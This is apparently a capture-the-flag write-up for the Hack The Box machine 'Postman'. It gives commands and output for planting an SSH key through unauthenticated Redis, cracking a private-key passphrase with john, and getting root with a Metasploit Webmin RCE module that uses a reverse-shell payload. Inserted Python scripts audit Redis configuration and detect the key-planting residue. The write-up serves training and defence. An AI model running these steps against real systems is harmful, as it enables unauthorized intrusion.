HTB-Postman

Posted by admin

Box description

Contents

  • Information gathering

    • nmap
    • Redis unauthenticated access
    • ssh2john
  • Privilege escalation

    • webmin

Information gathering

Target IP

[screenshot: image-20210505153313330]

Port scan

nmap -sS -sV -p- -T4 10.10.10.160

Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

[screenshot: image-20210505135401702]

6379

╭─[y2my] as root in ~/Desktop/htb                                                                                                   13:45:46
╰──➤  redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"

Redis accepts the connection without any password.
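From the defender's side, this step depends on three settings on the Redis host: the port is reachable from the network, no requirepass is configured, and CONFIG is still available so a client can later repoint dir and dbfilename. The audit script below is an added example and not code from this writeup; the two redis.conf samples it checks are constructed here to show the weak and the hardened state (the password in the hardened sample is a placeholder).

```python
"""Audit redis.conf for the settings that let an unauthenticated client
redirect a SAVE into an arbitrary directory. Added example, not from the writeup."""

# Constructed sample: weak defaults of the kind found on the target.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
# requirepass foobared
dir /var/lib/redis
dbfilename dump.rdb
"""

# Constructed sample: the same file hardened (password value is a placeholder).
HARDENED_CONF = """
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
dir /var/lib/redis
dbfilename dump.rdb
"""

LOOPBACK = {"127.0.0.1", "::1", "-::1"}


def parse_conf(text):
    """Map each directive (lower-cased) to the list of its value strings,
    skipping blank lines and comments."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        conf.setdefault(key, []).append(value)
    return conf


def audit_redis_conf(text):
    """Return a list of findings; an empty list means none of the four
    weaknesses used in the writeup is present."""
    conf = parse_conf(text)
    findings = []

    # 1. Exposure: without a loopback-only bind, the port answers on every interface.
    bind_addrs = set()
    for value in conf.get("bind", []):
        bind_addrs.update(value.split())
    if not bind_addrs or not bind_addrs <= LOOPBACK:
        findings.append("bind: not restricted to loopback")

    # 2. protected-mode is the last safety net when bind/requirepass are absent.
    if any(v.lower() == "no" for v in conf.get("protected-mode", [])):
        findings.append("protected-mode: explicitly disabled")

    # 3. No password means every reachable client gets full command access.
    passwords = [v.strip('"') for v in conf.get("requirepass", [])]
    if not any(passwords):
        findings.append("requirepass: not set")

    # 4. CONFIG SET dir/dbfilename is what turns SAVE into a file-write primitive.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v.split()}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG reachable under its default name")

    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["OK"])
```

Binding to loopback plus a strong requirepass closes the path on its own; renaming CONFIG is an extra layer that also breaks some admin tooling, so treat that finding as advisory rather than mandatory.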

10000 https

[screenshot: image-20210505135347450]

A quick search shows this version has had a command-execution vulnerability, but it requires valid credentials.

Exploitation

redis

1. Generate an SSH key

ssh-keygen -t rsa (press Enter through every prompt)

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:+3fgZMoPBM6LWuJ+6NiNizuJUuqL02IntpjU00SN1y0 root@y2my
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|      o . .      |
|     o o.E .     |
|    . .o ..      |
|     .  S .      |
|  o o  . +  +    |
| * +.oo o..= .   |
|X=+*o*.  .o.o .  |
|O*O=Oo.   .o..   |
+----[SHA256]-----+

The generated public key:

cat ~/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHM5GKgcYzAq8sjDoXoQFCqYST19bG/RfDhkri9Ez3EoyHHn4cAbay9Q9QoTjvmtW40fpkD5omjtpogTCNQ0ai15aeg9tk6z0xlG4FO40fSooqZryJzAFvKKGXrjIek4nOguOc4mfl0I+QbJTaQQKAA4kb4j2BlsoMvCV/a3U7V3+nQ+sCuRJRDGLj2KK/RueY3r+TktFwOcPtXPEy0DEO0j99LFikzVOjbY9FEXyuA9BtVpyh4r0L8IvrawbJS6kQ7rfiRr3JM87C5ogZdknk160vmal+I8pp/TYq81y68f/PCqS9TGt4JaC+DiAQZt+OjZAdZJDGylorR2MNIoqyqLnMELTPhsiCw2EmejY814jMLStaVrwYuL6FUGbl/LSDdWc43UNKgtIVyrFiZrVOETLz8XUMYHoK/t/YZqYp43Vl2UtB0qfmm3jj4xcW0pWnp0di8JSmITWXqB1RLydrJVx+U30bn8WK5mPjxO7guooC4qWAMhC4i6kUnTGo54c= root@y2my

2. Write the SSH key via Redis

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> set x "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHM5GKgcYzAq8sjDoXoQFCqYST19bG/RfDhkri9Ez3EoyHHn4cAbay9Q9QoTjvmtW40fpkD5omjtpogTCNQ0ai15aeg9tk6z0xlG4FO40fSooqZryJzAFvKKGXrjIek4nOguOc4mfl0I+QbJTaQQKAA4kb4j2BlsoMvCV/a3U7V3+nQ+sCuRJRDGLj2KK/RueY3r+TktFwOcPtXPEy0DEO0j99LFikzVOjbY9FEXyuA9BtVpyh4r0L8IvrawbJS6kQ7rfiRr3JM87C5ogZdknk160vmal+I8pp/TYq81y68f/PCqS9TGt4JaC+DiAQZt+OjZAdZJDGylorR2MNIoqyqLnMELTPhsiCw2EmejY814jMLStaVrwYuL6FUGbl/LSDdWc43UNKgtIVyrFiZrVOETLz8XUMYHoK/t/YZqYp43Vl2UtB0qfmm3jj4xcW0pWnp0di8JSmITWXqB1RLydrJVx+U30bn8WK5mPjxO7guooC4qWAMhC4i6kUnTGo54c= root@y2my \n\n\n"
OK
10.10.10.160:6379> save

3. After the save, we can connect

ssh -i ~/.ssh/id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ 
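What this procedure leaves on disk is an RDB dump masquerading as authorized_keys: an RDB header, the planted key surrounded by the padding newlines, and a binary trailer, which sshd tolerates because it skips lines it cannot parse. The script below is an added example, not code from this writeup, that flags those traces; both sample files, the dummy ssh-rsa key and the RDB-shaped header and trailer bytes are constructed here for the demonstration (the header is shaped after an RDB v8 file, not copied from one).

```python
"""Detect the residue an RDB dump leaves when a Redis SAVE has been pointed at
~/.ssh/authorized_keys. Added example, not from the writeup."""
import base64
import struct

RDB_MAGIC = b"REDIS"
KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}


def _ssh_string(b):
    """Length-prefixed string as used inside OpenSSH key blobs."""
    return struct.pack(">I", len(b)) + b


# Constructed ssh-rsa entry: the blob's first field repeats the key type, the
# following mpints are dummies, so this key is unusable for anything.
_BLOB = (_ssh_string(b"ssh-rsa") + _ssh_string(b"\x01\x00\x01")
         + _ssh_string(b"\x00" + b"\xab" * 32))
KEY_LINE = b"ssh-rsa " + base64.b64encode(_BLOB) + b" user@workstation"

# Constructed: a clean authorized_keys and one written by a Redis SAVE.
CLEAN_FILE = KEY_LINE + b"\n"
RDB_HEADER = b"REDIS0008\xfa\x09redis-ver\x054.0.9\xfe\x00\xfb\x01\x00\x00\x01x"
RDB_TRAILER = b"\xff\x8b\x12\x34\x56\x78\x9a\xbc"
DUMPED_FILE = RDB_HEADER + b"\n\n\n " + KEY_LINE + b" \n\n\n" + RDB_TRAILER


def valid_key_line(line):
    """True for a well-formed OpenSSH public key entry. An options field with
    spaces inside quotes is not handled; such lines count as non-key here."""
    parts = line.split()
    for i, tok in enumerate(parts[:2]):      # key type may follow an options field
        if tok in KEY_TYPES and i + 1 < len(parts):
            try:
                blob = base64.b64decode(parts[i + 1], validate=True)
            except ValueError:
                return False
            if len(blob) < 4:
                return False
            n = struct.unpack(">I", blob[:4])[0]
            return blob[4:4 + n] == tok.encode()
    return False


def audit_authorized_keys(data):
    """Return (findings, valid_key_lines). sshd skips unparsable lines, so the
    dump's junk does not stop the planted key from working; the junk itself is
    the detection signal."""
    findings = []
    if data.startswith(RDB_MAGIC):
        findings.append("starts with Redis RDB magic: file was written by a Redis SAVE")
    valid, junk = [], 0
    for raw in data.splitlines():
        line = raw.decode("utf-8", errors="replace").strip()
        if not line or line.startswith("#"):
            continue
        if valid_key_line(line):
            valid.append(line)
        else:
            junk += 1
    if junk:
        findings.append(f"{junk} unparsable line(s) next to {len(valid)} valid key(s)")
    if any(b < 0x09 or 0x0E <= b < 0x20 or b >= 0x7F for b in data):
        findings.append("non-printable or non-ASCII bytes present")
    return findings, valid


if __name__ == "__main__":
    for name, data in (("clean", CLEAN_FILE), ("dumped", DUMPED_FILE)):
        print(name, audit_authorized_keys(data)[0] or ["OK"])
```

In practice you would run audit_authorized_keys over every authorized_keys file on the host, including service-account homes such as /var/lib/redis/.ssh, and alert on any finding; a recently modified authorized_keys owned by a daemon user that has no business logging in over SSH is worth a ticket even without the RDB magic.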

redis -> Matt

Found while checking the redis user's command history:

[screenshot: image-20210505145344719]

1. Locate the file

redis@Postman:~$ find / -name "id_rsa.bak" -ls 2>/dev/null
   158996      4 -rwxr-xr-x   1 Matt     Matt         1743 Aug 26  2019 /opt/id_rsa.bak

The file belongs to the user Matt, so it is presumably Matt's private key.

2. Crack the passphrase

python2 ssh2john.py id_rsa > mattpasswd

cat mattpasswd

john mattpasswd --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
1g 0:00:00:16 DONE (2021-05-05 14:21) 0.05917g/s 848621p/s 848621c/s 848621C/sa6_123..*7¡Vamos!
Session completed

We get computer2008.

Logging in to Webmin shows the version:

[screenshot: image-20210505153218313]

root

Method 1: use msf

exploit/linux/http/webmin_packageup_rce

msf6 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

We get root.

[screenshot: image-20210505145710884]
